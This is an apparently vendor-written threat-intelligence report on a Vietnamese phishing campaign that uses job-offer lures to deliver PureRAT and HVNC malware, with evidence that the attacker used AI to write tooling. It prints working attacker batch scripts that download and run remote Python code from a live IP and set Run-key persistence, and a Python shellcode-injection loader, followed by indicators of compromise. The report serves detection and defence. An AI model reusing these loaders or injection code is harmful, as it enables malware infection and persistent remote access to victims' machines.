• Multiple tools used by the attacker bear hallmarks of having been developed using AI, such as detailed comments and numbered steps in scripts, and instructions to the attacker in debug messages.
• Attacks begin with phishing emails, usually masquerading as job offers.
• Attacker is based in Vietnam and may be selling access to compromised organizations to other actors.

A Vietnamese threat actor is likely using AI to author code powering an ongoing phishing campaign delivering the PureRAT malware and other payloads. The phishing emails masquerade as job opportunities and the attacker may be using them as a lure in the hope that recipients open the emails using work computers. The attacker’s usage of AI provides further evidence that the technology is being used by lower-skilled attackers to assist with developing tools and automating their attacks. 

Evolving attack chain

The campaign, which was first documented by Trend in December 2025, begins with emails using job opportunities or offers as lures. While Trend reported that the emails featured malicious ZIP or RAR archive attachments, recent examples seen by Symantec were hosted on Dropbox, with the phishing emails likely containing links and instructions to download the file. The attacker may have changed tactics in the belief that downloads from a known cloud service may be less likely to raise red flags than attachments.

If the ZIP archives are opened, they initiate an infection chain leading to the installation of PureRAT or another payload such as a HVNC. Malicious archives found by our Threat Hunter Team include:

• New_Remote_Marketing_Opportunity_OPPO_Find_X9_Series.zip
• Global_Ads_Strategy_Role_Summary.zip
• Project Management and Implementation Plan VH.zip
• HNR_Project_Progress_And_Development.zip
• Executing_operations_to_the_highest_standard.zip
• OPPO_FindX9_New_Product_Promotion_Plan.zip
• Advertising_and_Marketing_Henkel-AG_Smartwash.zip
• SAMSUNG_OLED_G5_Marketing_Dossier.zip
• Duolingo_Marketing_Skills_Assessment_oct.zip, Duolingo_Marketing_Skills_Assessment_oct.rar
• American Giant promotional material.rar
• Action Plan for Project Execution Z7.zip

The archives usually contain an executable, which is then used to sideload a malicious DLL. In many cases, the executable used for sideloading was the Haihaisoft PDF Reader or an old version of Microsoft Excel (Trend, meanwhile, reported that the attackers were using a renamed version of the Foxit PDF reader for sideloading). In other cases, the attackers renamed the executable to masquerade as something else. Some of the names of the executables include:

• adobereader.exe 
• Salary and Benefits Package.EXE
• Salary and Benefits.exe
• 2.OPPO FindX9 Compensation Benefits Responsibilities.exe
• 2.Remuneration_Packages_and_Employee_Benefits.exe
• 2.Salary-benefits-bonus-KPIs(Job responsibilities).exe
• 2.Salary_And_Responsibility_Table.exe
• Duolingo_Marketing_Skills_Assessment_oct.exe

Filenames for the malicious DLLs included: oledlg.dll, msimg32.dll, version.dll, and profapi.dll. These DLLs usually act as loaders for malicious batch scripts. 

One of the batch scripts analysed by our Threat Hunter Team appeared to be very likely authored using AI.

@echo off

setlocal enabledelayedexpansion

:: Tạo thư mục ẩn nếu chưa tồn tại

set "targetDir=%LOCALAPPDATA%\Google Chrome"

if not exist "!targetDir!" (

    mkdir "!targetDir!"

    attrib +h +s "!targetDir!"

)

:: Đổi tên file giả dạng

ren "document.pdf" "huna.zip" >nul 2>nul

ren "document.docx" "huna.exe" >nul 2>nul

:: Giải nén zip bằng 7z hoặc tương đương

"huna.exe" x "huna.zip" -p"huna@dev.vn" -o"!targetDir!" -y >nul 2>nul

:: Dòng code Python cần chạy

set "CODE=import requests,base64;exec(base64.b64decode(requests.get('http://196.251.86.145/huna2').text))"

:: Chạy zvchost.exe với đoạn mã Python (ẩn cửa sổ)

start "" /b "!targetDir!\zvchost.exe" -c "!CODE!"

:: Thêm vào Startup (escape toàn bộ chuỗi đúng cách)

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" ^

    /v "ChromeUpdate" ^

    /d "\"!targetDir!\zvchost.exe\" -c \"!CODE!\"" ^

    /f >nul 2>nul

:: === THÊM: Tìm và chạy file .pdf trong thư mục đích ===

for /f "delims=" %%F in ('dir "!targetDir!\*.pdf" /a-d /b /s 2^>nul') do (

    echo Found PDF: "%%F"

    start "" "%%F"

    goto :after_pdf

)

:after_pdf

:: Trả lại tên file gốc

ren "huna.exe" "document.docx" >nul 2>nul

ren "huna.zip" "document.pdf" >nul 2>nulexit

When executed, the batch file creates a hidden directory under %LOCALAPPDATA%\Google Chrome. It then takes locally saved, innocuously named document.pdf and document.docx files and renames them to huna.zip and huna.exe. The latter is usually a renamed version of 7zip or WinRAR and is used to open huna.zip into the previously created hidden Chrome directory using a hardcoded password (huna@dev.vn). It then runs a Python interpreter (zvhost.exe) from this hidden directory with a Python command that fetches Base64 encoded code for the payload from the following URL: http://196.251.86[.]145/huna2. 

After decoding and running the payload, it then creates a persistence mechanism by adding itself to the current user’s Run key, ensuring that the same Python script runs at every logon, masquerading as ChromeUpdate. In some cases, a scheduled task is created, with various names, such as 123456.exe.

After the persistence mechanism is create it then opens a benign PDF from the same hidden directory, most likely to continue to trick the target into believing they’re simply opening a document. Finally, it renames huna.exe and huna.zip back to document.docx and document.pdf.

Virtually every step in the batch file has a detailed comment in Vietnamese. This level of commenting is rare outside of scripts authored using AI, particularly in malicious files, which usually contain no comments or minimal comments. 

Another version of this batch file had a more streamlined set of instructions and even more evidence of AI assistance. 

@echo off
setlocal enabledelayedexpansion

set "targetDir=%LOCALAPPDATA%\Google Chrome"
set "exePath=!targetDir!\zvchost.exe"

if not exist "!targetDir!" (
    mkdir "!targetDir!" >nul 2>&1
    attrib +h +s "!targetDir!" >nul 2>&1
)

ren document.pdf huna.zip >nul 2>&1
ren document.docx huna.exe >nul 2>&1
huna.exe x huna.zip -p"huna@dev.vn" -o"!targetDir!" -y >nul 2>&1

:: ✅ Kiểm tra tồn tại
if not exist "!exePath!" exit /b

:: 🔥 CHẠY VỚI WORKING DIRECTORY ĐÚNG
start "" /min /D "!targetDir!" "!exePath!" huna

:: Khôi phục tên
ren huna.exe document.docx >nul 2>&1
ren huna.zip document.pdf >nul 2>&1

Many AIs have a tendency to insert emojis in code comments because they’ve been trained using data from social platforms such as Reddit. 

In addition to the batch scripts, several examples of Python code that acted as loaders for the final payload were also very likely written with the assistance of AI. Below is an excerpt from a Python script used to load a HVNC payload:

# === STEP 1: Base64 shellcode ===
shellcode_b64 = "BASE64SHELLCODE (too large to be put here)"  #NHỚ dán shellcode base64 HVNC vào đây

if not shellcode_b64.strip():
    print("[-] Chưa có shellcode base64. Thêm vào biến shellcode_b64.")
    sys.exit(1)

shellcode = base64.b64decode(shellcode_b64)

# === STEP 2: Windows API constants ===
CREATE_SUSPENDED = 0x4
MEM_COMMIT = 0x1000
PAGE_EXECUTE_READWRITE = 0x40
PROCESS_ALL_ACCESS = 0x1F0FFF
STARTF_USESHOWWINDOW = 0x00000001
SW_HIDE = 0

# === STEP 3: Structs ===
class STARTUPINFO(ctypes.Structure):
    fields = [
        ("cb", wt.DWORD),
        ("lpReserved", wt.LPWSTR),
        ("lpDesktop", wt.LPWSTR),
        ("lpTitle", wt.LPWSTR),
        ("dwX", wt.DWORD),
        ("dwY", wt.DWORD),
        ("dwXSize", wt.DWORD),
        ("dwYSize", wt.DWORD),
        ("dwXCountChars", wt.DWORD),
        ("dwYCountChars", wt.DWORD),
        ("dwFillAttribute", wt.DWORD),
        ("dwFlags", wt.DWORD),
        ("wShowWindow", wt.WORD),
        ("cbReserved2", wt.WORD),
        ("lpReserved2", ctypes.POINTER(ctypes.c_byte)),
        ("hStdInput", wt.HANDLE),
        ("hStdOutput", wt.HANDLE),
        ("hStdError", wt.HANDLE),
    ]

class PROCESS_INFORMATION(ctypes.Structure):
    fields = [
        ("hProcess", wt.HANDLE),
        ("hThread", wt.HANDLE),
        ("dwProcessId", wt.DWORD),
        ("dwThreadId", wt.DWORD),
    ]

# === STEP 4: Load API ===
kernel32 = ctypes.windll.kernel32

VirtualAllocEx = kernel32.VirtualAllocEx
WriteProcessMemory = kernel32.WriteProcessMemory
CreateRemoteThread = kernel32.CreateRemoteThread
CreateProcessW = kernel32.CreateProcessW
ResumeThread = kernel32.ResumeThread
CloseHandle = kernel32.CloseHandle

# === STEP 5: Tạo tiến trình InstallUtil.exe ngầm (ẩn cửa sổ) ===
target_path = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
if not os.path.exists(target_path):
    print("[-] Không tìm thấy đường dẫn InstallUtil.exe")
    sys.exit(1)

startupinfo = STARTUPINFO()
startupinfo.cb = ctypes.sizeof(startupinfo)
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_HIDE

process_info = PROCESS_INFORMATION()

success = CreateProcessW(
    target_path, None, None, None, False,
    CREATE_SUSPENDED, None, None,
    ctypes.byref(startupinfo),
    ctypes.byref(process_info)
)

if not success:
    print(f"[-] CreateProcessW failed with error: {kernel32.GetLastError()}")
    sys.exit(1)

print(f"[+] Created suspended process PID: {process_info.dwProcessId}")

# === STEP 6: Inject shellcode vào process mới ===
addr = VirtualAllocEx(process_info.hProcess, None, len(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
if not addr:
    print("[-] VirtualAllocEx failed")
    sys.exit(1)

written = ctypes.c_size_t(0)
if not WriteProcessMemory(process_info.hProcess, addr, shellcode, len(shellcode), ctypes.byref(written)):
    print("[-] WriteProcessMemory failed")
    sys.exit(1)

print(f"[+] Injected {written.value} bytes at address: 0x{addr:08X}")

# === STEP 7: Chạy shellcode thông qua remote thread ===
thread_handle = CreateRemoteThread(process_info.hProcess, None, 0, addr, None, 0, None)
if not thread_handle:
    print("[-] CreateRemoteThread failed")
    sys.exit(1)

print("[+] Shellcode is running inside InstallUtil.exe")

# === STEP 8: Đóng handle (optional) ===
CloseHandle(process_info.hThread)
CloseHandle(process_info.hProcess)
CloseHandle(thread_handle)

Each step in the code is numbered with explanatory comments and debug messages in a mixture of Vietnamese and English. The code even contains comments with instructions for the attacker, e.g. “Remember to paste the base64-encoded HVNC shellcode here”.

The attacker appears to be continually refining their attack chain. Multiple variants of scripts were found. Infrastructure also appeared to be regularly chained. In some cases the payload was downloaded from a hardcoded IP address, in others it was downloaded from Gitlab. 

Vietnamese threat actor?

Aside from the Vietnamese comments in the code, @dev.vn addresses appear in three passwords used by the attackers – the aforementioned “huna@dev.vn”, “hwan@dev.vn" and “hwanxkiem@dev.vn”. Hwanxkiem appears to be a phonetic variation of Hoàn Kiếm, a district in the Vietnamese capital of Hanoi. One of the file names used by the attacker - nvmeikxnawh.zip – includes the word Hwanxkiem reversed. 

The Gitlab account used by the attacker is another variation on the word, in this case with the syllables reversed: gitlab[.]com/kimxhwan. It is unclear what the name and handle on the account (Earlie Waverley and @earliewaverleyfb355) refer to. The name “Huna” is consistently used by the attacker in filenames and password. It doesn’t appear to correspond to any Vietnamese word and may be a handle used by the attacker. 

The motivation behind the attacks is more likely to be cybercrime than espionage. The range of organizations targeted and the different lures used suggests a wide ranging trawl rather than targeted activity. The attacker may be casting their net for jobseekers in multiple countries in the hope that they open the emails on their work computer. The malware payloads may then be used to obtain a foothold on these networks in order to sell access on to other attackers. 

The use of AI by this attacker is in line with what we see as the primary malicious use case for AI at present. As outlined in our recent whitepaper, AI can help lower the barrier to entry for less skilled attackers, helping them to write code and build out attack toolkits. 

Protection/Mitigation

For the latest protection updates, please visit the Symantec Protection Bulletin.

Indicators of Compromise

If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.

06ad3e407d5370648350e64e11278fc974197ae26fa02457c5dea645d3936bc1 – Batch script

0a683540902704d640041438fd585bf4e0636d37c1711c1893bb09c10e854928 – Batch script

10debd8d5819879435d349855e7792b57b94334251357b3580dd4dd3311246c3 – Batch script

1280cba4e109220ce4b17e722a55f31977112df3fa170b417f67227483677cc5 – Archive

12a7f1aec5303e3e2eee59d9616b7e440f9c877d0db76620e8768c85433f3762 – Sideloaded DLL

21779c1ca04a01a58b31d6a2dabaaee4a83d839922535d6520e629699adaf6be – Batch script

21aba2329d9a6f68fdc358c487a54523beb8ee7751ec69779f53df09b14f5e10 – Batch script

2caaf6ec466cd38dccd20a5555633e20d11ee3b345e0b93e12daabdffa676228 – Batch script

2d0da28f388a9870184d0ac3905cd61947cf18830245f204033200a27c2dc3c0 – Batch script

2e92c68a1d4447275e4f35e9726779c72388a6f74ddfad9b73f0c02aa5b480c4 – Batch script

31dbfc89186553536f88cde60228024edbcb7fb042da6be05d75653a87999cc0 – Sideloaded DLL

397eed8ff076484896dd40fefa697f714d1f2a06e1dfacf90e821283f10b41e6 – Sideloaded DLL

3e927da764492a8122c822ab566956a65f255bd6da9f312e8e72f4d9856b8225 – Sideloaded DLL

415a2eded0537280c574ff8927c6ffafb7685487ce01fdee9185425ff09770ac – Sideloaded DLL

46dc25ffcae19255b07489403f4c1050bf7a71e5e678ffdf9b41d19b9e0467b4 – Legitimate Text2pdf used for side-loading

4728b3b51c10ec8d03d4fa82172df4ea96c0c19249c230aa7e4202434c46ba19 – Batch script

49d3fe3a00d8d3e247a3462e334ecd204dc9378c48ba55f19fc2a6c07ca7fd6b – Sideloaded DLL

4f52905aef07da42553fb843022efcfa985ad7ee7fd8a0cc58cddcd65290ccf9 – Batch script

5044d19ed26c72423e1039cc8c02631639a21287d1f885500bc089c6375fa719 – Python HVNC payload

5524b58ed2ee28c592d08a884711cb503355491dc6b474ed95a842944e7ced3b – Python HVNC payload

58f029907441888fcb38bc7ef3cb854f79f47a78ef8363b8420c7c95a60c63a7 – Batch script

5b5d67a4fb1ff53f39988d34ea2adf62f09d6aac685c2d17f6336202eff217ee – Sideloaded DLL

66fbf7bf5040308f4a194a6259d6490958d03ae3105964d53fd35e42a9a40197 – HVNC payload

6fe62e780bacbdf22c7cf522dc84d9a9757cf80980e43b5a3a6d4a98a1f4b61a – Python HVNC payload

70defb76cc82faf19e7183aa8f92ccaf3942b39524ee80610a77aa02a690b762 – Batch script

7ee96809a375c35dc03abd02cd0acdd4849af5785f7c37679d4eabb739b455c0 – Batch script

834653eff148cb83dbfdb20ec6f769d2e454fdac4fe40bbd47bf4663f796dfec – Batch script

8387e6fe5adcb90a42abdf9ed6cdfdbea66bb431f6aa7fc32d5f7137fc140090 – Batch script

8389c6564abc4a7556abdc72f399fb3339db9492628d25eda1a3cec954c0c68d – Sideloaded DLL

8a15a4a4d5158b8826b478a33e407bd1ffb39e010e0986a5547f114ffe6e9167 – Python payload

8c210acf7e491abdd73960cc6d2f3ead7872d7221af9e151cae650d6634b899c – Legitimate PDF Reader

98fef41aa11235e714b458259bba9720c2de0e88b7a190167bd0077ee1e038f4 – Python HVNC payload

9b94a6d16e357bf57e84db3a749f40231841f2a34cec414256d5c8f63facf84c – Python HVNC payload

9fdc1691e1c96acff6cb18a26f135fabaec5ceed394b28dabac068a991c4f0e7 – Batch script

a0c26e5fd249e284b403a74250cd1f5d34c6b90369b082c8050267f7efc6d15d – Batch script

a1f3c59c59eabfd89a6be69bea4d10e4a490ac6e9c931e8fa4c4b2c8e7580389 – Batch script

a6cc3ee93342adc4ac9a0e9600504199688b20fea4e9e5a06d3b3a2b6fbfc075 – Sideloaded DLL

aec135d23f695c9338e1333a8c975544053e8c2615f842b73b085bc96906696d – Batch script

b04b506eb06303d00b3f02d0dbcd20d3bfe93e4030c6db1655136198ea40e9c3 – Sideloaded DLL

b398e081284b09c8c049e319e87d74bf4df4f0423efbab9202fdc64ed7ca9fd9 – Batch script

ba2f77577811cbf5c1ba579e730e283a076157612a73137213296a3851d901ea – Batch script

bce2cd273f4610387c32bfb80ecd0402c70d97f89c57611e7f79344033da3e55 – Batch script

c09bec5f1a9e222de8cf968ffa63492542f7c5860079105895e8908d366460f6 – Benign Word document

c1c509f40ede7d4a33a092114bbab1e6b4d29fbf21f6ce5f2356902506b6c8f3 – Sideloaded DLL

c5ad8eaae4d107523300d4e6681a15a94848adb8f13516e0d00575fc32957997 – Sideloaded DLL

c5b1990c35e5f801878b8347b548356243dfb8396e22870f2db7c0d9ad9374ab – Benign Word document

d06ec13250708cab022d76b78adf8bbe3b4cf1d7f6e483f2624c18d232e3f896 – Batch script

d293aa394efe4112ed95951aafc43e04975d8c9d715dcb170b4d3ae0cec8af5b – Batch script

d3fb96a634269b8fb1cc1edaa2c4fdcff60aab887da7de4dc9f7c968c9bb49b1 – Batch script

d45eb4b8130132055b44ffe4462888d5bb90f11ac0c07312d09b8b8abc0b23ce – Batch script

da37825fb5428c6788db3296b0bfaaa8197704699bcdb240d8b032350faa59ae – Sideloaded DLL

dc0a8a417b64193d507839c57c3718d5ccfcade6cb917ae6c729be166edc5b9b – Legitimate PDF reader

dcefa82d7ac6887a253effb54d611e8df15177a993c7d53e453e5ea92f404983 – Batch script

de1ed295857e5551dd7ff1ff34f92d670ef237acf3c4326ddd94bf0956b6a807 – Batch script

de2f6a3056f74e104e0e9134c2652662a8fc0e9ccf519e83c033b6df0a98ae05 – Batch script

df38de5eb1f5d534e1a836fbf34552bc80d722bb5301976707ee2dd78997bfc5 – Batch script

e59655948efb89b4d905dd4bbbac28c7a06e4a03ec5bc93b9ea1c0a43f91bfcf – Sideloaded DLL

e62e0851ddf145c3c2c1fb1fbccb7252dce0edd427c8ba74d9b6ff813c36c728 – Sideloaded DLL

e927e64c4d88c19d708dca504bcf220fd25cbc6fa91e573eba97e52d745288fc – Batch script

ea0630d4582cbf033fa75d4ce1f1e8371181ed58d7961f0c98b66f458ca46c45 – Sideloaded DLL

ecb67b475457fdd3bfbb7a0911b657a1eb8343ca982e5037b062914d991e772e – Sideloaded DLL

efe49c9134756beba5b475b5e396fdf72a917bb007310bb69d4299c10259ee42 – Batch script

effba77be35fb75299883957d3acf9560970a054bc85d20457552e3511293cd0 – Sideloaded DLL

f2d07dd0dda0c0fd94427fa03b5fd83a73933904678b35afd8723130d65196e0 – Batch script

f35958930f3f4e8a13f09c2c3eba4771652b6a03338913ddeb6b0278c306bec6 – Sideloaded DLL

f3c54064ae75e0f7aaec74acf749716d15f8f1856f002f5ccb3bcb9daf140171 – Batch script

F83cf38fd1315530c6d325eb5082c1fe38e0037fdd28dec5e7e2bdd6cd75e3ed – Sideloaded DLL

fae70495819c22d4563d2ece75b4dce210635ebc3136b69365b40564f26b7efa – Batch script

fcd644e03e1958122feb1b7163df49927bb4e4d09c51948b5950e5d809ecf955 – Batch script

http://116.202.214[.]234/huna 
http://139.99.17[.]175/test_exe/AdobeReader.exe 
http://139.99.17[.]175/test_exe/msimg32.dll 
http://139.99.17[.]175/test_exe/oledlg.dll 
http://139.99.17[.]175/test_exe/sv_chost.exe 
http://139.99.17[.]175/test_exe/version.dll 
http://139.99.17[.]184/doraemon 
http://139.99.17[.]184/huna
http://144.172.116[.]103/huna 
http://196.251.86[.]145/huna 
http://196.251.86[.]145/huna2 
http://217.217.253[.]186/huna10 
http://217.217.253[.]186/huna9 
http://51.79.214[.]125/huna 
http://51.79.214[.]125/huna2
http://51.79.214[.]125/huna3

https://dl.dropboxusercontent[.]com/scl/fi/59d5r1yxdchrqvhfiyaq0/Executing_operations_to_the_highest_standard.zip?rlkey=ynlo8uc56506b9fa5sdomazhx&st=euu2j0jj&dl=0
https://dl.dropboxusercontent[.]com/scl/fi/b268eenis4r9i8r3aaj1t/OPPO_FindX9_Candidate_Guide.rar?rlkey=241h69yf5n14lm5njd05kva5l&st=0vzw0az8&dl=0
https://dl.dropboxusercontent[.]com/scl/fi/bn95kutel2n8gcqzm29pd/New_Remote_Marketing_Opportunity_OPPO_Find_X9_Series.zip?rlkey=4udwkctm0kffvl5o46ovmcub7&st=ipgw7lgs&dl=0 
https://dl.dropboxusercontent[.]com/scl/fi/co3uwts5yjwpkv81ah9d5/Global_Ads_Strategy_Role_Summary.zip?rlkey=x6rnh8dg6nykwhzsfg6e9z47u&st=aps5we2c&dl=0 https://dl.dropboxusercontent[.]com/scl/fi/uefer36kfpiocoblp7g9n/HNR_Project_Progress_And_Development.zip?rlkey=izjft9z5gj6wruqla5zmg93up&st=78pi42mn&dl=0
https://dmca-wipo[.]com/nauh 
https://ginten555333[.]com/Libraries/PythonCode 
https://ginten555333[.]com/Libraries/UnZipV2 
https://ginten555333[.]com/Libraries/VahGG.html 
https://ginten555333[.]com/LibraryInstalling/PyCharm 
https://gitlab[.]com/children157/mr-wolf/-/raw/main/mrwolf?inline=false 
https://gitlab[.]com/hwan5471422/hwan/-/raw/main/Final_Doraemon?inline=false 
https://gitlab[.]com/kimxhwan/kimxhwan/-/raw/main/kimxhwan?inline=false 
https://release-assets.githubusercontent[.]com/github-production-release-asset/135854144/9453630a-3a22-4a1f-b56a-87d594ec2bfe?sp=r&sv=2018-11-09&sr=b&spr=https&se=2025-10-20T06%3A18%3A28Z&rscd=attachment%3B+filename%3Drpcs3-v0.0.38-18249-0c4e7fc1_win64_msvc.7z&rsct=application%2Foctet-stream&skoid=96c2d410-5711-43a1-aedd-ab1947aa7ab0&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skt=2025-10-20T05%3A17%3A50Z&ske=2025-10-20T06%3A18%3A28Z&sks=b&skv=2018-11-09&sig=J3%2BE%2BPBLC7cfn1Fvq0WjUkQOti4QSmFhK%2FBRwwgjtmA%3D&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmVsZWFzZS1hc3NldHMuZ2l0aHVidXNlcmNvbnRlbnQuY29tIiwia2V5Ijoia2V5MSIsImV4cCI6MTc2MDkzOTI3NSwibmJmIjoxNzYwOTM3NDc1LCJwYXRoIjoicmVsZWFzZWFzc2V0cHJvZHVjdGlvbi5ibG9iLmNvcmUud2luZG93cy5uZXQifQ.Z1uQODdqrQTTXjrL_VMOha20XGXa9bNQBZfIiqB77Uo&response-content-disposition=attachment%3B%20filename%3Drpcs3-v0.0.38-18249-0c4e7fc1_win64_msvc.7z&response-content-type=application%2Foctet-stream https://uc052f7e086998a45432c8803ea1.dl.dropboxusercontent[.]com/cd/0/get/Cys-s2WZ0h5J8HdXmXhBONXB2CPYeannKu6zO764wruev4rRR2gH_4QFWwEgT_g-GYxRNGpHxuTs9BeB_2j4EqK0QAIzyf45dq3Mj9k38KBT_shW5ImD7FJW3dEQ1wfbCdduMKiJTc6T3b9jaCRBvPvZ/file?dl=1#

139.99.17[.]175
144.172.116[.]103
139.99.17[.]184
217.217.253[.]186
116.202.214[.]234
103.166.185[.]228
15.235.172[.]166
192.30.139[.]187
dmca-wipo[.]com
ginten555333[.]com